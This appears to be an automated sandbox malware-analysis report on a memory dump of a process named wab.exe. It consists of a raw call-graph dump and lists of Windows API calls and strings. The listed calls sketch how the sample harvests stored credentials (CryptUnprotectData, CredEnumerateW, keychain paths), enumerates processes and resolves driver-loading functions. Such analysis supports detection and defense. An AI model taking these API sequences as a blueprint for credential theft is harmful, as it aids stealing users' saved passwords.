wcschr 39154->39157 39155->39151 39159 414495 WritePrivateProfileStringW 39156->39159 39157->39156 39158 414463 _snwprintf 39157->39158 39158->39159 39159->39151 39160->38505 39162 40b2cc 27 API calls 39161->39162 39163 409615 39162->39163 39164 409d1f 6 API calls 39163->39164 39165 409625 39164->39165 39190 409b98 GetFileAttributesW 39165->39190 39167 409634 39168 409648 39167->39168 39191 4091b8 memset 39167->39191 39170 40b2cc 27 API calls 39168->39170 39172 408801 39168->39172 39171 40965d 39170->39171 39173 409d1f 6 API calls 39171->39173 39172->38508 39172->38540 39174 40966d 39173->39174 39243 409b98 GetFileAttributesW 39174->39243 39176 40967c 39176->39172 39177 409681 39176->39177 39244 409529 72 API calls 39177->39244 39179 409690 39179->39172 39180->38530 39181->38540 39182->38535 39183->38540 39190->39167 39245 40a6e6 WideCharToMultiByte 39191->39245 39193 409202 39246 444432 39193->39246 39196 40b273 27 API calls 39197 409236 39196->39197 39292 438552 39197->39292 39200 409383 39202 40b273 27 API calls 39200->39202 39204 409399 39202->39204 39203 409254 39205 40937b 39203->39205 39313 4253cf 17 API calls 39203->39313 39206 438552 134 API calls 39204->39206 39317 424f26 123 API calls 39205->39317 39224 4093a3 39206->39224 39209 409267 39314 4253cf 17 API calls 39209->39314 39210 4094ff 39321 443d90 39210->39321 39213 4251c4 137 API calls 39213->39224 39215 409507 39223 40951d 39215->39223 39341 408f2f 77 API calls 39215->39341 39217 4093df 39320 424f26 123 API calls 39217->39320 39221 4253cf 17 API calls 39221->39224 39223->39168 39224->39210 39224->39213 39224->39217 39224->39221 39226 4093e4 39224->39226 39318 4253af 17 API calls 39226->39318 39233 4093ed 39319 4253af 17 API calls 39233->39319 39236 4093f9 39236->39217 39237 409409 memcmp 39236->39237 39237->39217 39238 409421 memcmp 39237->39238 39239 4094a4 memcmp 39238->39239 39240 409435 39238->39240 39239->39217 39240->39217 39243->39176 39244->39179 39245->39193 39342 4438b5 39246->39342 39248 
44444c 39249 409215 39248->39249 39356 415a6d 39248->39356 39249->39196 39249->39223 39251 4442e6 11 API calls 39252 44469e 39251->39252 39252->39249 39255 443d90 111 API calls 39252->39255 39253 444486 39254 4444b9 memcpy 39253->39254 39280 4444a4 39253->39280 39360 415258 39254->39360 39255->39249 39257 444524 39258 444541 39257->39258 39259 44452a 39257->39259 39363 444316 39258->39363 39260 416935 16 API calls 39259->39260 39260->39280 39263 444316 18 API calls 39264 444563 39263->39264 39265 444316 18 API calls 39264->39265 39266 44456f 39265->39266 39267 444316 18 API calls 39266->39267 39268 44457f 39267->39268 39268->39280 39377 432d4e 39268->39377 39280->39251 39430 438460 39292->39430 39294 409240 39294->39200 39295 4251c4 39294->39295 39442 424f07 39295->39442 39297 4251e4 39298 4251f7 39297->39298 39299 4251e8 39297->39299 39450 4250f8 39298->39450 39449 4446ea 11 API calls 39299->39449 39301 4251f2 39301->39203 39303 425209 39306 425249 39303->39306 39309 4250f8 127 API calls 39303->39309 39310 425287 39303->39310 39458 4384e9 135 API calls 39303->39458 39459 424f74 124 API calls 39303->39459 39306->39310 39309->39303 39313->39209 39317->39200 39318->39233 39319->39236 39320->39210 39322 443da3 39321->39322 39323 443db6 39321->39323 39466 41707a 11 API calls 39322->39466 39323->39215 39325 443da8 39326 443dbc 39325->39326 39327 443dac 39325->39327 39468 4300e8 memset memset memcpy 39326->39468 39467 4446ea 11 API calls 39327->39467 39341->39223 39343 4438d0 39342->39343 39352 4438c9 39342->39352 39344 415378 memcpy memcpy 39343->39344 39345 4438d5 39344->39345 39346 4154e2 10 API calls 39345->39346 39347 443906 39345->39347 39345->39352 39346->39347 39348 443970 memset 39347->39348 39347->39352 39351 44398b 39348->39351 39349 4439a0 39350 415700 10 API calls 39349->39350 39349->39352 39354 4439c0 39350->39354 39351->39349 39353 41975c 10 API calls 39351->39353 39352->39248 39353->39349 39354->39352 39355 418981 10 API calls 39354->39355 39355->39352 
39357 415a77 39356->39357 39358 415a8d 39357->39358 39359 415a7e memset 39357->39359 39358->39253 39359->39358 39361 4438b5 11 API calls 39360->39361 39362 41525d 39361->39362 39362->39257 39364 444328 39363->39364 39365 444423 39364->39365 39366 44434e 39364->39366 39367 4446ea 11 API calls 39365->39367 39368 432d4e memset memset memcpy 39366->39368 39375 444381 39367->39375 39369 44435a 39368->39369 39371 444375 39369->39371 39376 44438b 39369->39376 39370 432d4e memset memset memcpy 39372 4443ec 39370->39372 39373 416935 16 API calls 39371->39373 39374 416935 16 API calls 39372->39374 39372->39375 39373->39375 39374->39375 39375->39263 39376->39370 39378 432d65 39377->39378 39379 432d58 39377->39379 39431 41703f 11 API calls 39430->39431 39432 43847a 39431->39432 39433 43848a 39432->39433 39434 43847e 39432->39434 39436 438270 134 API calls 39433->39436 39435 4446ea 11 API calls 39434->39435 39438 438488 39435->39438 39437 4384aa 39436->39437 39437->39438 39439 424f26 123 API calls 39437->39439 39438->39294 39440 4384bb 39439->39440 39441 438270 134 API calls 39440->39441 39441->39438 39443 424f1f 39442->39443 39444 424f0c 39442->39444 39446 424eea 11 API calls 39443->39446 39445 416760 11 API calls 39444->39445 39447 424f18 39445->39447 39448 424f24 39446->39448 39447->39297 39448->39297 39449->39301 39451 425108 39450->39451 39457 42510d 39450->39457 39452 424f74 124 API calls 39451->39452 39452->39457 39453 42569b 125 API calls 39454 42516e 39453->39454 39456 415c7d 16 API calls 39454->39456 39455 425115 39455->39303 39456->39455 39457->39453 39457->39455 39458->39303 39459->39303 39466->39325 39467->39323 39499 413f4f 39472->39499 39475 413f37 K32GetModuleFileNameExW 39476 413f4a 39475->39476 39476->38567 39478 413969 wcscpy 39477->39478 39479 41396c wcschr 39477->39479 39491 413a3a 39478->39491 39479->39478 39481 41398e 39479->39481 39504 4097f7 wcslen wcslen _memicmp 39481->39504 39483 41399a 39484 4139a4 memset 39483->39484 39485 4139e6 39483->39485 39505 
409dd5 GetWindowsDirectoryW wcscpy 39484->39505 39487 413a31 wcscpy 39485->39487 39488 4139ec memset 39485->39488 39487->39491 39506 409dd5 GetWindowsDirectoryW wcscpy 39488->39506 39489 4139c9 wcscpy wcscat 39489->39491 39491->38567 39492 413a11 memcpy wcscat 39492->39491 39494 413cb0 GetModuleHandleW 39493->39494 39495 413cda 39493->39495 39494->39495 39496 413cbf GetProcAddress 39494->39496 39497 413ce3 GetProcessTimes 39495->39497 39498 413cf6 39495->39498 39496->39495 39497->38570 39498->38570 39500 413f2f 39499->39500 39501 413f54 39499->39501 39500->39475 39500->39476 39502 40a804 8 API calls 39501->39502 39503 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39502->39503 39503->39500 39504->39483 39505->39489 39506->39492 39507->38590 39508->38613 39510 409cf9 GetVersionExW 39509->39510 39511 409d0a 39509->39511 39510->39511 39511->38620 39511->38626 39512->38625 39513->38629 39514->38631 39515->38696 39517 40bba5 39516->39517 39564 40cc26 39517->39564 39520 40bd4b 39585 40cc0c 39520->39585 39525 40b2cc 27 API calls 39526 40bbef 39525->39526 39592 40ccf0 _wcsicmp 39526->39592 39528 40bbf5 39528->39520 39593 40ccb4 6 API calls 39528->39593 39530 40bc26 39531 40cf04 17 API calls 39530->39531 39532 40bc2e 39531->39532 39533 40bd43 39532->39533 39534 40b2cc 27 API calls 39532->39534 39535 40cc0c 4 API calls 39533->39535 39536 40bc40 39534->39536 39535->39520 39594 40ccf0 _wcsicmp 39536->39594 39538 40bc46 39538->39533 39539 40bc61 memset memset WideCharToMultiByte 39538->39539 39595 40103c strlen 39539->39595 39541 40bcc0 39542 40b273 27 API calls 39541->39542 39543 40bcd0 memcmp 39542->39543 39543->39533 39544 40bce2 39543->39544 39545 404423 38 API calls 39544->39545 39546 40bd10 39545->39546 39546->39533 39547 40bd3a LocalFree 39546->39547 39548 40bd1f memcpy 39546->39548 39547->39533 39548->39547 39549->38710 39551 409a74 GetTempFileNameW 39550->39551 39552 409a66 GetWindowsDirectoryW 39550->39552 39551->38709 39552->39551 
39553->38748 39554->38748 39555->38748 39556->38748 39557->38748 39558->38748 39559->38748 39560->38748 39561->38748 39562->38723 39563->38745 39596 4096c3 CreateFileW 39564->39596 39566 40cc34 39567 40cc3d GetFileSize 39566->39567 39569 40bbca 39566->39569 39568 40afcf 2 API calls 39567->39568 39570 40cc64 39568->39570 39569->39520 39576 40cf04 39569->39576 39597 40a2ef ReadFile 39570->39597 39572 40cc71 39598 40ab4a MultiByteToWideChar 39572->39598 39574 40cc95 FindCloseChangeNotification 39575 40b04b ??3@YAXPAX 39574->39575 39575->39569 39577 40b633 ??3@YAXPAX 39576->39577 39578 40cf14 39577->39578 39604 40b1ab ??3@YAXPAX ??3@YAXPAX 39578->39604 39580 40bbdd 39580->39520 39580->39525 39581 40cf1b 39581->39580 39583 40cfef 39581->39583 39605 40cd4b 39581->39605 39584 40cd4b 14 API calls 39583->39584 39584->39580 39586 40b633 ??3@YAXPAX 39585->39586 39587 40cc15 39586->39587 39588 40aa04 ??3@YAXPAX 39587->39588 39589 40cc1d 39588->39589 39654 40b1ab ??3@YAXPAX ??3@YAXPAX 39589->39654 39591 40b7d4 memset CreateFileW 39591->38702 39591->38703 39592->39528 39593->39530 39594->39538 39595->39541 39596->39566 39597->39572 39599 40ab6b 39598->39599 39603 40ab93 39598->39603 39600 40a9ce 4 API calls 39599->39600 39601 40ab74 39600->39601 39602 40ab7c MultiByteToWideChar 39601->39602 39602->39603 39603->39574 39604->39581 39606 40cd7b 39605->39606 39639 40aa29 39606->39639 39608 40cef5 39609 40aa04 ??3@YAXPAX 39608->39609 39610 40cefd 39609->39610 39610->39581 39612 40aa29 6 API calls 39613 40ce1d 39612->39613 39614 40aa29 6 API calls 39613->39614 39615 40ce3e 39614->39615 39616 40ce6a 39615->39616 39647 40abb7 wcslen memmove 39615->39647 39617 40ce9f 39616->39617 39650 40abb7 wcslen memmove 39616->39650 39619 40a8d0 7 API calls 39617->39619 39622 40ceb5 39619->39622 39620 40ce56 39648 40aa71 wcslen 39620->39648 39629 40a8d0 7 API calls 39622->39629 39624 40ce8b 39651 40aa71 wcslen 39624->39651 39625 40ce5e 39649 40abb7 wcslen memmove 39625->39649 39627 40ce93 39652 
40abb7 wcslen memmove 39627->39652 39631 40cecb 39629->39631 39653 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39631->39653 39633 40cedd 39634 40aa04 ??3@YAXPAX 39633->39634 39635 40cee5 39634->39635 39636 40aa04 ??3@YAXPAX 39635->39636 39637 40ceed 39636->39637 39638 40aa04 ??3@YAXPAX 39637->39638 39638->39608 39640 40aa33 39639->39640 39646 40aa63 39639->39646 39641 40aa44 39640->39641 39642 40aa38 wcslen 39640->39642 39643 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39641->39643 39642->39641 39644 40aa4d 39643->39644 39645 40aa51 memcpy 39644->39645 39644->39646 39645->39646 39646->39608 39646->39612 39647->39620 39648->39625 39649->39616 39650->39624 39651->39627 39652->39617 39653->39633 39654->39591 39655->38764 39656->38771 37535 44dea5 37536 44deb5 FreeLibrary 37535->37536 37537 44dec3 37535->37537 37536->37537 39666 4148b6 FindResourceW 39667 4148cf SizeofResource 39666->39667 39670 4148f9 39666->39670 39668 4148e0 LoadResource 39667->39668 39667->39670 39669 4148ee LockResource 39668->39669 39668->39670 39669->39670 37711 415304 ??3@YAXPAX 39671 441b3f 39681 43a9f6 39671->39681 39673 441b61 39854 4386af memset 39673->39854 39675 44189a 39676 442bd4 39675->39676 39677 4418e2 39675->39677 39678 4418ea 39676->39678 39856 441409 memset 39676->39856 39677->39678 39855 4414a9 12 API calls 39677->39855 39682 43aa20 39681->39682 39683 43aadf 39681->39683 39682->39683 39684 43aa34 memset 39682->39684 39683->39673 39685 43aa56 39684->39685 39686 43aa4d 39684->39686 39857 43a6e7 39685->39857 39865 42c02e memset 39686->39865 39691 43aad3 39867 4169a7 11 API calls 39691->39867 39692 43aaae 39692->39683 39692->39691 39707 43aae5 39692->39707 39693 43ac18 39696 43ac47 39693->39696 39869 42bbd5 memcpy memcpy memcpy memset memcpy 39693->39869 39697 43aca8 39696->39697 39870 438eed 16 API calls 39696->39870 39700 43acd5 39697->39700 39872 4233ae 11 API calls 39697->39872 39873 423426 11 API calls 39700->39873 39701 43ac87 39871 4233c5 16 API calls 39701->39871 39705 43ace1 

Control-flow Graph: function starting at 40dd85 (interactive graph rendering and raw node/edge list omitted; legend: Executed / Not Executed)
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 594330280-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

Control-flow Graph: function starting at 413d4c (interactive graph rendering and raw node/edge list omitted; legend: Executed / Not Executed)
APIs
  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
Strings
Memory Dump Source
• Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wab.jbxd
Similarity
• API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 912665193-1740548384
• Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
• Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
• Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
• Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
• FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT ref: 0040B60D
Strings
Memory Dump Source
• Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wab.jbxd
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: BIN
• API String ID: 1668488027-1015027815
• Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
• Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• ??3@YAXPAX@Z.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wab.jbxd
Similarity
• API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
• String ID:
• API String ID: 2947809556-0
• Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
APIs
• CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wab.jbxd
Similarity
• API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
• String ID:
• API String ID: 767404330-0
                                                              • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                              • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileFind$FirstNext
                                                              • String ID:
                                                              • API String ID: 1690352074-0
                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                              APIs
                                                              • memset.MSVCRT ref: 0041898C
                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: InfoSystemmemset
                                                              • String ID:
                                                              • API String ID: 3558857096-0
                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                              Control-flow Graph
                                                              (rendered graph for function 0044553B not recoverable in text; executed/not-executed edge listing omitted)
                                                              APIs
                                                              • memset.MSVCRT ref: 004455C2
                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 0044570D
                                                              • memset.MSVCRT ref: 00445725
                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              • memset.MSVCRT ref: 0044573D
                                                              • memset.MSVCRT ref: 00445755
                                                              • memset.MSVCRT ref: 004458CB
                                                              • memset.MSVCRT ref: 004458E3
                                                              • memset.MSVCRT ref: 0044596E
                                                              • memset.MSVCRT ref: 00445A10
                                                              • memset.MSVCRT ref: 00445A28
                                                              • memset.MSVCRT ref: 00445AC6
                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              • memset.MSVCRT ref: 00445B52
                                                              • memset.MSVCRT ref: 00445B6A
                                                              • memset.MSVCRT ref: 00445C9B
                                                              • memset.MSVCRT ref: 00445CB3
                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                              • memset.MSVCRT ref: 00445B82
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                              • memset.MSVCRT ref: 00445986
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                              • API String ID: 2745753283-3798722523
                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
